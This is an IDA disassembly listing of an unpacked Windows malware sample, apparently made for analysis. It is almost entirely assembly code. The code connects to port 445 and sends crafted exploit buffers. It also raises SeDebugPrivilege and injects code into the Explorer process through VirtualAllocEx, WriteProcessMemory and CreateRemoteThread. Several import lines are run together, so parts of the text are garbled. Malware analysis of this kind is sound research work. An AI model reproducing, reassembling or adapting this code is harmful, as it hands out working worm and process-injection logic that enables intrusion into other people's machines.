;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 4152C383AA3AD3931AAE2588970D0C7A
; File Name : u:\work\4152c383aa3ad3931aae2588970d0c7a_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31500000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31501000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31501000 dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31501004 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31501008 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_3150100C dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHash ; sub_315028AE+FD�r
dword_31501010 dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31501014 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31501018 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_3150101C dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKeydword_31501020 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31501024 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31501028 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3150102C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_315023E4+1D�r
dword_31501030 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31501034 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_315023E4+4E�r ...
dword_31501038 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownA align 10h
dword_31501040 dd 7C830D74h, 7C80D262h; resolved to->KERNEL32.lstrcmpA ; sub_31503722:loc_31503968�r ...
dword_31501048 dd 7C8360DDh ; resolved to->KERNEL32.SetCurrentDirectoryA ; sub_315029C7+14B�r
dword_3150104C dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_31503608+ED�r
dword_31501050 dd 7C80176Bh ; resolved to->KERNEL32.GetSystemTime ; sub_31503371+A�r
dword_31501054 dd 7C810B1Ch ; resolved to->KERNEL32.SystemTimeToFileTimedword_31501058 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_3150105C dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31501060 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_31501064 dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31501068 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_315029C7+3F�r ...
dword_3150106C dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; UPX0:31503448�r ...
dword_31501070 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31501074 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31501078 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3150107C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31501080 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31501084 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31501088 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_315026C2+8F�r ...
dword_3150108C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventA ; sub_31502BE8+98�r
dword_31501090 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_31502BE8+C2�r
dword_31501094 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_315025F6+F�r
dword_31501098 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_315028AE:loc_31502980�r ...
dword_3150109C dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_315025F6+C3�r
dword_315010A0 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_315011C0+272�r ...
dword_315010A4 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31501A62+E2�r ...
dword_315010A8 dd 7C810111h ; resolved to->KERNEL32.lstrcpynA ; sub_315029C7+69�r ...
dword_315010AC dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_315010B0 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_315017AF+2C�r
dword_315010B4 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_31501D96+EC�r
dword_315010B8 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_315010BC dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_31501911+19�r ...
dword_315010C0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_31502490+92�r
dword_315010C4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31501D1A�r
dword_315010C8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_315031EC+13�r ...
dword_315010CC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_315010D0 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31501911+12�r ...
dword_315010D4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_315010D8 dd 7C80A017h ; resolved to->KERNEL32.SetEvent ; sub_31502B4C+1B�r
dword_315010DC dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_315010E0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_31501BA8+66�r ...
dword_315010E4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_31502128+3F�r ...
dword_315010E8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_315010EC dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_315010F0 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_315029C7+83�r ...
align 8
dword_315010F8 dd 77C1BF18h ; resolved to->MSVCRT.atoidword_315010FC dd 77C4CBE0h ; resolved to->MSVCRT.atandword_31501100 dd 77C4D444h ; resolved to->MSVCRT.sindword_31501104 dd 77C4CD34h ; resolved to->MSVCRT.cos; ---------------------------------------------------------------------------
loc_31501108: ; DATA XREF: sub_31503A98�r
cmp [edi], ah
retn 0FA77h ; DATA XREF: UPX0:loc_31503A92�r
; ---------------------------------------------------------------------------
db 27h, 0C2h, 77h
dword_31501110 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31503722+B9�r
dword_31501114 dd 77C46030h ; resolved to->MSVCRT.strcpydword_31501118 dd 77C46040h ; resolved to->MSVCRT.strcat; ---------------------------------------------------------------------------
loc_3150111C: ; DATA XREF: UPX0:loc_31503A80�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31501120 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_31502490+79�r ...
dword_31501124 dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31501BA8:loc_31501C76�r ...
dword_31501128 dd 77C371BCh ; resolved to->MSVCRT.srand ; sub_31503371+5D�r
dword_3150112C dd 77C46F70h ; resolved to->MSVCRT.memcpydword_31501130 dd 77C478A0h ; resolved to->MSVCRT.strlendword_31501134 dd 77C475F0h ; resolved to->MSVCRT.memset dd 0
dword_3150113C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_31501A62+8B�r ...
dword_31501140 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31501144 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31501148 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessId align 10h
dword_31501150 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlAdword_31501154 dd 42C2C8A1h ; resolved to->WININET.InternetOpenAdword_31501158 dd 42C2ABF4h ; resolved to->WININET.InternetReadFiledword_3150115C dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:31502307�r
dd 0
dword_31501164 dd 71AB2DC0h ; resolved to->WS2_32.selectdword_31501168 dd 71AB2BC0h ; resolved to->WS2_32.ntohldword_3150116C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31501170 dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_31501F6B+7A�r ...
dword_31501174 dd 71AB88D3h ; resolved to->WS2_32.listen ; sub_31501F6B+93�r ...
dword_31501178 dd 71AC1028h ; resolved to->WS2_32.accept ; sub_31501F6B+B5�r ...
dword_3150117C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31501180 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31501184 dd 71AB2BF4h ; resolved to->WS2_32.inet_addrdword_31501188 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_315019F3+25�r
dword_3150118C dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_31501BA8+AC�r ...
dword_31501190 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_31502277+D�r
dword_31501194 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_31501BA8+F0�r ...
dword_31501198 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_31502DEC+46�r
dword_3150119C dd 71AB428Ah ; resolved to->WS2_32.send ; sub_31501A62+67�r ...
dword_315011A0 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_315011C0+1D8�r ...
dword_315011A4 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_31501A62+128�r
dword_315011A8 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_31501A62+12F�r ...
align 10h
dword_315011B0 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315011C0 proc near ; CODE XREF: sub_315020C4+36�p
; sub_31502128+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31503A50
mov eax, dword_315059CC
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_315059D0
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_3150118C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31501720
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_31501190 ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_315010A8 ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_315059C0
push eax
call dword_3150113C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31501233: ; CODE XREF: sub_315011C0+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31501233
push 60h
lea eax, [ebp+var_E4]
push offset dword_315054E0
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A3E ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31503A44 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31503A3E ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A3E ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A3E ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31503A44 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31503A38 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31503A38 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31501194 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31501198 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31501716
mov esi, dword_315010A4
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_3150119C
push 89h
push offset dword_315052C8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0A8h
push offset dword_31505354
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0DEh
push offset dword_31505400
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
cmp eax, 46h
jl loc_3150170B
cmp [ebp+var_730], 31h
jnz loc_315015B6
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31503A38 ; memset
add esp, 0Ch
push offset byte_31505000
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_31505000
push eax
call sub_31503A44 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31503A44 ; memcpy
mov eax, dword_31505906
add esp, 0Ch
mov [ebp+var_798], eax
loc_31501457: ; CODE XREF: sub_315011C0+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 68h
push offset dword_31505544
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0A0h
push offset dword_315055B0
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
cmp [ebp+arg_0], 0
jz loc_315016A6
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31505768
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31503A44 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_315057D4
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31503A44 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31505848
push eax
call sub_31503A44 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_315016FE
; ---------------------------------------------------------------------------
loc_315015B6: ; CODE XREF: sub_315011C0+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31503A38 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31505940
push eax
call sub_31503A44 ; memcpy
push offset byte_31505000
call sub_31503A3E ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_31505000
push eax
call sub_31503A44 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_315059B8
push eax
call sub_31503A44 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31505940
push eax
call sub_31503A44 ; memcpy
add esp, 40h
push offset byte_31505000
call sub_31503A3E ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_31505000
push eax
call sub_31503A44 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31501652: ; CODE XREF: sub_315011C0+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31501652
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31503A38 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31503A38 ; memset
add esp, 18h
jmp loc_31501457
; ---------------------------------------------------------------------------
loc_315016A6: ; CODE XREF: sub_315011C0+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_31505654
push eax
call sub_31503A44 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31503A44 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_315056D4
push eax
call sub_31503A44 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_315016FE: ; CODE XREF: sub_315011C0+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_3150170B: ; CODE XREF: sub_315011C0+1AD�j
; sub_315011C0+1E1�j ...
push 2
push [ebp+var_4]
call dword_315011A4 ; shutdown
loc_31501716: ; CODE XREF: sub_315011C0+166�j
push [ebp+var_4]
call dword_315011A8 ; closesocket
pop esi
loc_31501720: ; CODE XREF: sub_315011C0+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_315011C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501727 proc near ; CODE XREF: UPX0:loc_31501D5A�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_315010B4 ; LoadLibraryA
mov esi, dword_315010B0
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_315017AB
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_315017AB
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_315017AB
lea eax, [ebp+var_C]
push eax
push 20h
call dword_315010AC ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_315017AB: ; CODE XREF: sub_31501727+28�j
; sub_31501727+37�j ...
pop edi
pop esi
leave
retn
sub_31501727 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315017AF proc near ; CODE XREF: UPX0:31501D6E�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, ds:dword_31506190
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_315010C4 ; GetModuleHandleA
mov esi, dword_315010B0
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_315017F6
loc_315017F2: ; CODE XREF: sub_315017AF+54�j
push 1
jmp short loc_31501847
; ---------------------------------------------------------------------------
loc_315017F6: ; CODE XREF: sub_315017AF+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_315017F2
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31501144 ; FindWindowA
test eax, eax
jnz short loc_31501824
call dword_31501140 ; GetForegroundWindow
test eax, eax
jnz short loc_31501824
push 2
jmp short loc_31501847
; ---------------------------------------------------------------------------
loc_31501824: ; CODE XREF: sub_315017AF+65�j
; sub_315017AF+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31501148 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_315010C0 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_3150184A
push 3
loc_31501847: ; CODE XREF: sub_315017AF+45�j
; sub_315017AF+73�j
pop eax
jmp short loc_315018B5
; ---------------------------------------------------------------------------
loc_3150184A: ; CODE XREF: sub_315017AF+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_315010BC
test eax, eax
jz short loc_315018A8
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_315010B8 ; WriteProcessMemory
push ds:dword_31506164
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31501894
push eax
call esi ; CloseHandle
jmp short loc_315018AF
; ---------------------------------------------------------------------------
loc_31501894: ; CODE XREF: sub_315017AF+DE�j
push offset aUterm13_2i ; "uterm13.2i"
call sub_315018E8
pop ecx
mov [ebp+var_4], 5
jmp short loc_315018AF
; ---------------------------------------------------------------------------
loc_315018A8: ; CODE XREF: sub_315017AF+B2�j
mov [ebp+var_4], 4
loc_315018AF: ; CODE XREF: sub_315017AF+E3�j
; sub_315017AF+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_315018B5: ; CODE XREF: sub_315017AF+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_315017AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315018BA proc near ; CODE XREF: sub_31501BA8+B�p
; UPX0:31501D30�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_315010C8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_31501128 ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_315018BA endp
; =============== S U B R O U T I N E =======================================
sub_315018E8 proc near ; CODE XREF: sub_315017AF+EA�p
; UPX0:31501D3A�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_315010CC ; CreateMutexA
retn
sub_315018E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315018F7 proc near ; CODE XREF: sub_31501D96+145�p
; sub_31501D96+150�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_315010D0 ; CreateThread
pop ebp
retn
sub_315018F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501911 proc near ; CODE XREF: sub_31501BA8+12C�p
; sub_31501D96+12B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_315010D0 ; CreateThread
push eax
call dword_315010BC ; CloseHandle
pop ebp
retn
sub_31501911 endp
; =============== S U B R O U T I N E =======================================
sub_31501932 proc near ; CODE XREF: sub_31501F6B+26�p
; sub_315025F6+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_3150195A
loc_31501943: ; CODE XREF: sub_31501932+26�j
call dword_31501124 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31501943
loc_3150195A: ; CODE XREF: sub_31501932+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31501932 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501962 proc near ; CODE XREF: sub_315029C7+16B�p
; sub_31503608+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31503A38 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_315010D4 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_315010BC
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_31501962 endp
; =============== S U B R O U T I N E =======================================
sub_315019B8 proc near ; CODE XREF: sub_31502DEC+20�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_31501184 ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_315019D5
test esi, esi
jnz short loc_315019E7
cmp byte ptr [edi], 30h
jz short loc_315019EE
loc_315019D5: ; CODE XREF: sub_315019B8+12�j
push edi
call dword_31501188 ; gethostbyname
test eax, eax
jz short loc_315019E7
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_315019E7: ; CODE XREF: sub_315019B8+16�j
; sub_315019B8+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_315019EE
xor esi, esi
loc_315019EE: ; CODE XREF: sub_315019B8+1B�j
; sub_315019B8+32�j
mov eax, esi
pop edi
pop esi
retn
sub_315019B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315019F3 proc near ; CODE XREF: sub_315021B0+3E�p
; sub_31502277+7�p
var_34 = byte ptr -34h
push ebp
